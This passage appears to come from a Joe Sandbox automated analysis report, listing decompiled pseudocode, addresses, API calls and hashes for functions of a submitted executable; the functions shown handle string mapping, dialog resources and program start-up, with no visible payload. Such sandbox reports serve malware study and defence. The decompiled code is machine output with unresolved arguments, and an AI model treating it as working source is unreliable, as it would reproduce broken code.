					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x45a730; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x45a740; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E0041AED4( *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if( *(_t192 - 0x28) != 0) {
									_push( *(_t192 - 0x28));
									E00412A4D();
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E0041AF17(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if( *(_t192 - 0x3c) != 0) {
									_push(_t183);
									E00412A4D();
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E00412260(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E00412140(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E0041AF17(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E00412247( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E00412140(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E00412BDF(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x45a740; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E00412260(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E00412A4D();
									}
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E00412A4D();
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E00412260(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										_t157 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										__eflags = _t157;
										if(_t157 != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if( *(_t192 + 0x1c) != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E00412247(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(_t160 == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E00412247(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}





























                                                                              0x00419558
                                                                              0x00419558
                                                                              0x0041955a
                                                                              0x0041955f
                                                                              0x00419566
                                                                              0x0041956c
                                                                              0x00419572
                                                                              0x00419587
                                                                              0x00419591
                                                                              0x00419597
                                                                              0x0041959a
                                                                              0x0041959c
                                                                              0x0041959c
                                                                              0x00419589
                                                                              0x00419589
                                                                              0x00419589
                                                                              0x00419587
                                                                              0x004195a9
                                                                              0x004195c6
                                                                              0x004195c6
                                                                              0x004195ce
                                                                              0x004197b0
                                                                              0x004197b3
                                                                              0x004197b5
                                                                              0x004197b8
                                                                              0x004197bb
                                                                              0x004197bd
                                                                              0x004197c2
                                                                              0x004197c2
                                                                              0x004197c5
                                                                              0x004197c8
                                                                              0x004197ca
                                                                              0x004197cf
                                                                              0x004197cf
                                                                              0x004197d5
                                                                              0x004197db
                                                                              0x004197de
                                                                              0x004197e1
                                                                              0x004197ea
                                                                              0x004197ed
                                                                              0x004198f9
                                                                              0x004198fb
                                                                              0x004198fb
                                                                              0x004198fe
                                                                              0x00419900
                                                                              0x00419903
                                                                              0x00419908
                                                                              0x00419909
                                                                              0x00000000
                                                                              0x00419909
                                                                              0x004197f3
                                                                              0x004197f4
                                                                              0x004197f5
                                                                              0x004197f8
                                                                              0x004197f9
                                                                              0x004197fc
                                                                              0x004197fd
                                                                              0x00419800
                                                                              0x00419805
                                                                              0x00419808
                                                                              0x0041980b
                                                                              0x0041980d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419821
                                                                              0x00419823
                                                                              0x00419826
                                                                              0x00419828
                                                                              0x004198d0
                                                                              0x004198d3
                                                                              0x004198d3
                                                                              0x004198d6
                                                                              0x004198d8
                                                                              0x004198d9
                                                                              0x004198de
                                                                              0x00000000
                                                                              0x004198d6
                                                                              0x0041982e
                                                                              0x00419837
                                                                              0x0041983c
                                                                              0x0041983f
                                                                              0x00419841
                                                                              0x00419847
                                                                              0x0041984c
                                                                              0x00419861
                                                                              0x00419865
                                                                              0x00419867
                                                                              0x0041988c
                                                                              0x0041989c
                                                                              0x004198a2
                                                                              0x004198a5
                                                                              0x004198a7
                                                                              0x004198ad
                                                                              0x004198b0
                                                                              0x004198b6
                                                                              0x004198b7
                                                                              0x004198b8
                                                                              0x004198bb
                                                                              0x004198be
                                                                              0x004198ca
                                                                              0x004198cc
                                                                              0x00000000
                                                                              0x004198cc
                                                                              0x00000000
                                                                              0x00419869
                                                                              0x00419872
                                                                              0x00419874
                                                                              0x00419876
                                                                              0x004198a9
                                                                              0x004198a9
                                                                              0x00000000
                                                                              0x004198a9
                                                                              0x0041987d
                                                                              0x00419882
                                                                              0x00419885
                                                                              0x00000000
                                                                              0x00419885
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195dc
                                                                              0x004195df
                                                                              0x004197e3
                                                                              0x004197e3
                                                                              0x0041990b
                                                                              0x00419913
                                                                              0x00419913
                                                                              0x004195e5
                                                                              0x004195e7
                                                                              0x004195ea
                                                                              0x004195ed
                                                                              0x004195f3
                                                                              0x004195f5
                                                                              0x004195fa
                                                                              0x004195fa
                                                                              0x0041961e
                                                                              0x00419620
                                                                              0x00419625
                                                                              0x00000000
                                                                              0x0041962b
                                                                              0x0041962b
                                                                              0x0041963b
                                                                              0x00419640
                                                                              0x00419645
                                                                              0x00419648
                                                                              0x0041966c
                                                                              0x0041968a
                                                                              0x004196a1
                                                                              0x0041978d
                                                                              0x00419790
                                                                              0x00419792
                                                                              0x00419795
                                                                              0x0041979a
                                                                              0x0041979e
                                                                              0x004197a0
                                                                              0x004197a3
                                                                              0x004197a8
                                                                              0x004197a9
                                                                              0x00000000
                                                                              0x004197a9
                                                                              0x004196b9
                                                                              0x004196bb
                                                                              0x004196c0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004196ca
                                                                              0x004196f9
                                                                              0x00419709
                                                                              0x0041970e
                                                                              0x00419713
                                                                              0x00419716
                                                                              0x00419737
                                                                              0x0041973a
                                                                              0x00419754
                                                                              0x00419762
                                                                              0x00419768
                                                                              0x0041976a
                                                                              0x0041976c
                                                                              0x0041976d
                                                                              0x0041976e
                                                                              0x00419771
                                                                              0x00419777
                                                                              0x0041977a
                                                                              0x00419773
                                                                              0x00419773
                                                                              0x00419774
                                                                              0x00419774
                                                                              0x0041978b
                                                                              0x0041978b
                                                                              0x00000000
                                                                              0x0041973c
                                                                              0x00419740
                                                                              0x00419746
                                                                              0x00419749
                                                                              0x0041974b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041974d
                                                                              0x00000000
                                                                              0x0041974d
                                                                              0x0041973a
                                                                              0x004196cf
                                                                              0x004196ee
                                                                              0x004196ee
                                                                              0x00000000
                                                                              0x0041966e
                                                                              0x00419672
                                                                              0x00419677
                                                                              0x00419678
                                                                              0x0041967d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419683
                                                                              0x00000000
                                                                              0x00419683
                                                                              0x0041966c
                                                                              0x00419625
                                                                              0x004195ce
                                                                              0x004195ab
                                                                              0x004195ae
                                                                              0x004195b1
                                                                              0x004195b1
                                                                              0x004195b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195b6
                                                                              0x004195b9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004195bb
                                                                              0x00000000
                                                                              0x004195bb
                                                                              0x004195c3
                                                                              0x00000000

                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044BD1C,00000001,00000000,00000000,0044C648,00000038,00413616,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0041957F
                                                                              • GetLastError.KERNEL32 ref: 00419591
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,004138C3,?,00000000,00000000,0044C648,00000038,00413616,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00419618
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,004138C3,?,?,00000000), ref: 00419699
                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004196B3
                                                                              • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004196EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1775797328-0
                                                                              • Opcode ID: bc7423e4d7f57eb85201f9852d825b5b2932db197b3c5f9e7c8e6ea64a485af0
                                                                              • Instruction ID: fdae1fa2379dd99bd6e8e81df66aed6633f06c6fbcf9839d33b5de006f76c102
                                                                              • Opcode Fuzzy Hash: bc7423e4d7f57eb85201f9852d825b5b2932db197b3c5f9e7c8e6ea64a485af0
                                                                              • Instruction Fuzzy Hash: F6B17B72810219EFCF119FA0DD949EE7FB5FF08314F14412AF925A22A0D7398DA1DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00424BE6, Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E00424BE6(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E004128A0(E00430DC7, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E0042D179();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E0042D179() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E00424726(_t85);
					E004264AE();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E004276F9();
					_t49 = E00426406(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E004249D9(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E00428375(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E00425EAA(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E0042856F(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E00424760(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}
















                                                                              0x00424beb
                                                                              0x00424bf5
                                                                              0x00424bfa
                                                                              0x00424bfe
                                                                              0x00424c01
                                                                              0x00424c04
                                                                              0x00424c07
                                                                              0x00424c10
                                                                              0x00424c13
                                                                              0x00424c1a
                                                                              0x00424c2b
                                                                              0x00424c31
                                                                              0x00424c31
                                                                              0x00424c38
                                                                              0x00424c3d
                                                                              0x00424c43
                                                                              0x00424c43
                                                                              0x00424c47
                                                                              0x00424c58
                                                                              0x00424c5b
                                                                              0x00424c60
                                                                              0x00424c64
                                                                              0x00424c68
                                                                              0x00424c6a
                                                                              0x00424c70
                                                                              0x00424c73
                                                                              0x00424c78
                                                                              0x00424c7e
                                                                              0x00424c80
                                                                              0x00424c87
                                                                              0x00424c8d
                                                                              0x00424c8d
                                                                              0x00424c80
                                                                              0x00424c73
                                                                              0x00424c94
                                                                              0x00424c98
                                                                              0x00424c99
                                                                              0x00424ca1
                                                                              0x00424ca6
                                                                              0x00424ca7
                                                                              0x00424ca8
                                                                              0x00424cab
                                                                              0x00424cb2
                                                                              0x00424cb4
                                                                              0x00424cb6
                                                                              0x00424cba
                                                                              0x00424cbe
                                                                              0x00424cc1
                                                                              0x00424cc6
                                                                              0x00424cc9
                                                                              0x00424ccd
                                                                              0x00424ccd
                                                                              0x00424cd1
                                                                              0x00424cd1
                                                                              0x00424cd6
                                                                              0x00424cd9
                                                                              0x00424ce7
                                                                              0x00424ce7
                                                                              0x00424cd9
                                                                              0x00424d08
                                                                              0x00424d0c
                                                                              0x00424d0f
                                                                              0x00424d16
                                                                              0x00424d16
                                                                              0x00424d1c
                                                                              0x00424d1f
                                                                              0x00424d27
                                                                              0x00424d2a
                                                                              0x00424d2f
                                                                              0x00424d2f
                                                                              0x00424d2a
                                                                              0x00424d39
                                                                              0x00424d3e
                                                                              0x00424d43
                                                                              0x00424d46
                                                                              0x00424d4b
                                                                              0x00424d4b
                                                                              0x00424d51
                                                                              0x00424c49
                                                                              0x00424c49
                                                                              0x00424c49
                                                                              0x00424d59
                                                                              0x00424d62

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00424BEB
                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00424C23
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00424C2B
                                                                                • Part of subcall function 004264AE: UnhookWindowsHookEx.USER32(?), ref: 004264D3
                                                                              • LockResource.KERNEL32(00000000,00000000), ref: 00424C3D
                                                                              • GetDesktopWindow.USER32 ref: 00424C6A
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00424C78
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00424C87
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00424D16
                                                                              • GetActiveWindow.USER32 ref: 00424D21
                                                                              • SetActiveWindow.USER32(00000000,?,00000000), ref: 00424D2F
                                                                              • FreeResource.KERNEL32(00000000,?,00000000), ref: 00424D4B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                              • String ID:
                                                                              • API String ID: 833315621-0
                                                                              • Opcode ID: 2cc216c8b614916efa65477bb684d2566cb9d05834e8a344ce78247125119191
                                                                              • Instruction ID: 6a454918f9a6f3762d5711e9aaf44d5d3c97daba61b20119071f4fbe108b7d74
                                                                              • Opcode Fuzzy Hash: 2cc216c8b614916efa65477bb684d2566cb9d05834e8a344ce78247125119191
                                                                              • Instruction Fuzzy Hash: 99419431B01725DFCB21AFA5EA4976FBBB4EF84715F50012FF102A22A1CBB85941CA5D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412D5E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t35;
				struct HINSTANCE__* _t38;
				void* _t40;
				intOrPtr _t47;
				signed int _t50;
				intOrPtr _t52;
				signed int _t63;
				signed int _t64;
				long _t68;
				void* _t70;
				intOrPtr* _t77;
				long _t78;
				struct _OSVERSIONINFOA* _t84;
				signed int _t86;
				void* _t89;
				struct _OSVERSIONINFOA* _t90;

				_push(0x60);
				E00412BA4(__ebx, __edi, __esi);
				E00412260(0x94, __ecx, 0x44bc68);
				 *(_t89 - 0x18) = _t90;
				_t84 = _t90;
				_t84->dwOSVersionInfoSize = 0x94;
				GetVersionExA(_t84);
				_t68 = _t84->dwPlatformId;
				 *0x45a3f0 = _t68;
				_t35 = _t84->dwMajorVersion;
				 *0x45a3fc = _t35;
				_t78 = _t84->dwMinorVersion;
				 *0x45a400 = _t78;
				_t86 = _t84->dwBuildNumber & 0x00007fff;
				 *0x45a3f4 = _t86;
				if(_t68 != 2) {
					 *0x45a3f4 = _t86 | 0x00008000;
				}
				 *0x45a3f8 = (_t35 << 8) + _t78;
				_t38 = GetModuleHandleA(0);
				if(_t38->i != 0x5a4d) {
					L6:
					 *(_t89 - 0x1c) = 0;
				} else {
					_t77 =  *((intOrPtr*)(_t38 + 0x3c)) + _t38;
					if( *_t77 != 0x4550) {
						goto L6;
					} else {
						_t63 =  *(_t77 + 0x18) & 0x0000ffff;
						if(_t63 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t77 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t77 + 0x74)) <= 0xe) {
								goto L6;
							} else {
								_t64 = 0;
								__eflags =  *(_t77 + 0xe8);
								goto L11;
							}
						} else {
							if(_t63 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t77 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t77 + 0x84)) <= 0xe) {
									goto L6;
								} else {
									_t64 = 0;
									__eflags =  *(_t77 + 0xf8);
									L11:
									_t14 = __eflags != 0;
									__eflags = _t14;
									 *(_t89 - 0x1c) = _t64 & 0xffffff00 | _t14;
								}
							} else {
								goto L6;
							}
						}
					}
				}
				if(E00414943(1) == 0) {
					E00412D3A(0x1c);
				}
				_t40 = E0041640C();
				_t100 = _t40;
				if(_t40 == 0) {
					E00412D3A(0x10);
				}
				E00417AF7(_t100);
				 *(_t89 - 4) = 0;
				if(E004178F9() < 0) {
					E00412D15(0x1b);
				}
				 *0x45be90 = GetCommandLineA();
				 *0x45a3e0 = E004177D7();
				if(E00417735() < 0) {
					E00412D15(8);
				}
				if(E00417502() < 0) {
					E00412D15(9);
				}
				_t47 = E00413057(1);
				_pop(_t70);
				 *((intOrPtr*)(_t89 - 0x28)) = _t47;
				if(_t47 != 0) {
					E00412D15(_t47);
					_pop(_t70);
				}
				 *(_t89 - 0x44) = 0;
				GetStartupInfoA(_t89 - 0x70);
				 *((intOrPtr*)(_t89 - 0x20)) = E004174A5();
				_t105 =  *(_t89 - 0x44) & 0x00000001;
				if(( *(_t89 - 0x44) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t89 - 0x40) & 0x0000ffff;
				}
				_t52 = E004224CB(_t70, _t105, GetModuleHandleA(0), 0,  *((intOrPtr*)(_t89 - 0x20)), _t50);
				_t82 = _t52;
				 *((intOrPtr*)(_t89 - 0x2c)) = _t52;
				if( *(_t89 - 0x1c) == 0) {
					E00413184(_t82);
				}
				E004131A6();
				 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
				return E00412BDF(_t82);
			}



















                                                                              0x00412d5e
                                                                              0x00412d65
                                                                              0x00412d71
                                                                              0x00412d76
                                                                              0x00412d79
                                                                              0x00412d7b
                                                                              0x00412d7e
                                                                              0x00412d84
                                                                              0x00412d87
                                                                              0x00412d8d
                                                                              0x00412d90
                                                                              0x00412d95
                                                                              0x00412d98
                                                                              0x00412da1
                                                                              0x00412da7
                                                                              0x00412db0
                                                                              0x00412db8
                                                                              0x00412db8
                                                                              0x00412dc3
                                                                              0x00412dd1
                                                                              0x00412dd8
                                                                              0x00412df9
                                                                              0x00412df9
                                                                              0x00412dda
                                                                              0x00412ddd
                                                                              0x00412de5
                                                                              0x00000000
                                                                              0x00412de7
                                                                              0x00412de7
                                                                              0x00412df0
                                                                              0x00412e11
                                                                              0x00412e15
                                                                              0x00000000
                                                                              0x00412e17
                                                                              0x00412e17
                                                                              0x00412e19
                                                                              0x00000000
                                                                              0x00412e19
                                                                              0x00412df2
                                                                              0x00412df7
                                                                              0x00412dfe
                                                                              0x00412e05
                                                                              0x00000000
                                                                              0x00412e07
                                                                              0x00412e07
                                                                              0x00412e09
                                                                              0x00412e1f
                                                                              0x00412e1f
                                                                              0x00412e1f
                                                                              0x00412e22
                                                                              0x00412e22
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00412df7
                                                                              0x00412df0
                                                                              0x00412de5
                                                                              0x00412e2f
                                                                              0x00412e33
                                                                              0x00412e38
                                                                              0x00412e39
                                                                              0x00412e3e
                                                                              0x00412e40
                                                                              0x00412e44
                                                                              0x00412e49
                                                                              0x00412e4a
                                                                              0x00412e4f
                                                                              0x00412e59
                                                                              0x00412e5d
                                                                              0x00412e62
                                                                              0x00412e69
                                                                              0x00412e73
                                                                              0x00412e7f
                                                                              0x00412e83
                                                                              0x00412e88
                                                                              0x00412e90
                                                                              0x00412e94
                                                                              0x00412e99
                                                                              0x00412e9c
                                                                              0x00412ea1
                                                                              0x00412ea2
                                                                              0x00412ea7
                                                                              0x00412eaa
                                                                              0x00412eaf
                                                                              0x00412eaf
                                                                              0x00412eb0
                                                                              0x00412eb7
                                                                              0x00412ec2
                                                                              0x00412ec5
                                                                              0x00412ec9
                                                                              0x00412ed3
                                                                              0x00412ecb
                                                                              0x00412ecb
                                                                              0x00412ecb
                                                                              0x00412edd
                                                                              0x00412ee2
                                                                              0x00412ee4
                                                                              0x00412eea
                                                                              0x00412eed
                                                                              0x00412eed
                                                                              0x00412ef2
                                                                              0x00412f24
                                                                              0x00412f32

                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,0044BC68,00000060), ref: 00412D7E
                                                                              • GetModuleHandleA.KERNEL32(00000000,?,0044BC68,00000060), ref: 00412DD1
                                                                              • _fast_error_exit.LIBCMT ref: 00412E33
                                                                              • _fast_error_exit.LIBCMT ref: 00412E44
                                                                              • GetCommandLineA.KERNEL32(?,0044BC68,00000060), ref: 00412E63
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00412EB7
                                                                              • __wincmdln.LIBCMT ref: 00412EBD
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00412EDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
